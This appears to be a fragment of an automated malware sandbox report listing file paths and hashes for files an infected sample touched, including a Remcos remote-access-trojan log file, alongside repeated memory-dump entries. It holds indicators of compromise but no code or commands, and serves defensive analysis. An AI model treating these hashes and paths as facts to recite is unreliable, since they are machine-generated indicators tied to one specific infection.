SHA512 39118bd62e634457d6cca534deb8973b8afba4cba3864a0ad9c93f147c01ea562a335d62eddac74d4624bc343b037d9d35bb227472bdee6502611737bf99e421

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\000003.log

MD5 70e472617a30769aaa1e5657739b2e7f
SHA1 1715d8af7f8a44ddde770e600d7faa17d3c7ade7
SHA256 4dffc2aacf875fd2a87b6371c6bd86870c7c59c8d5cc21519c537b35c0f97f1a
SHA512 eee29e0b8eeef04529203ebaf11906ebd5e67bd7d16cc13f5fea7b502b547a02d4ea46e4c6b3222c356d873c9ff4ebbe952e569b877c363f0dda6004a85f3054

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\LOG

MD5 1be5d0078aa20e0b596082a0ab52b55a
SHA1 5f41d67893ed5e57e18aa5345075e8f24ec6dbcf
SHA256 2d0c94c28de964da1e37139c911a6705d3c07b4e4e8aa3ef9fcdb3c9e9ff2ada
SHA512 f3fd56a482815c3bde0972244032eac3e90ca224356b115caa21218a3ce3bc3395ddf248a1ff2a1750f0308c63c1bf28718c1a6f6dc459da691db6b88db050c1

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Microsoft Edge.lnk

MD5 2550526382baad1b6f7d28d99c1db104
SHA1 e8020a2baa7285de36a280a980678a16312aedb3
SHA256 15267e86a022b6320f33771f3f88b643f26a72b1b87d756807ed3ff7224533b1
SHA512 fb4fe67cf1c9d7a7fc547984757d69e1b4743b98412ce3bd399272a043bcd26dd4d3820135df4a4937d54720dab7c6dcf101c89e78b019cc8120a166befe0caa

memory/3016-361-0x00000000009D0000-0x0000000001C24000-memory.dmp

C:\ProgramData\remcos\logs.dat

MD5 e9b8138898b32630af9439e91fd72518
SHA1 e03d42e6119338f71003723d3beadf09ce581556
SHA256 11c9efdd4c248bcd36daeab7a229c602a474fd064133e059bef27763a6aa774a
SHA512 02008a9486d604a54801ee0dd1cdb57a1114c0d3cfd504c797399c22102fe56123f56332e9ffb5d983d88dd6fcd0ed1c52a05b662c10a975d77b5318018d6bdf

memory/3016-385-0x00000000009D0000-0x0000000001C24000-memory.dmp

memory/3016-388-0x00000000009D0000-0x0000000001C24000-memory.dmp

memory/3016-391-0x00000000009D0000-0x0000000001C24000-memory.dmp

memory/3016-394-0x00000000009D0000-0x0000000001C24000-memory.dmp

memory/3016-397-0x00000000009D0000-0x0000000001C24000-memory.dmp

memory/3016-400-0x00000000009D0000-0x0000000001C24000-memory.dmp

memory/3016-403-0x00000000009D0000-0x0000000001C24000-memory.dmp

memory/3016-406-0x00000000009D0000-0x0000000001C24000-memory.dmp

memory/3016-409-0x00000000009D0000-0x0000000001C24000-memory.dmp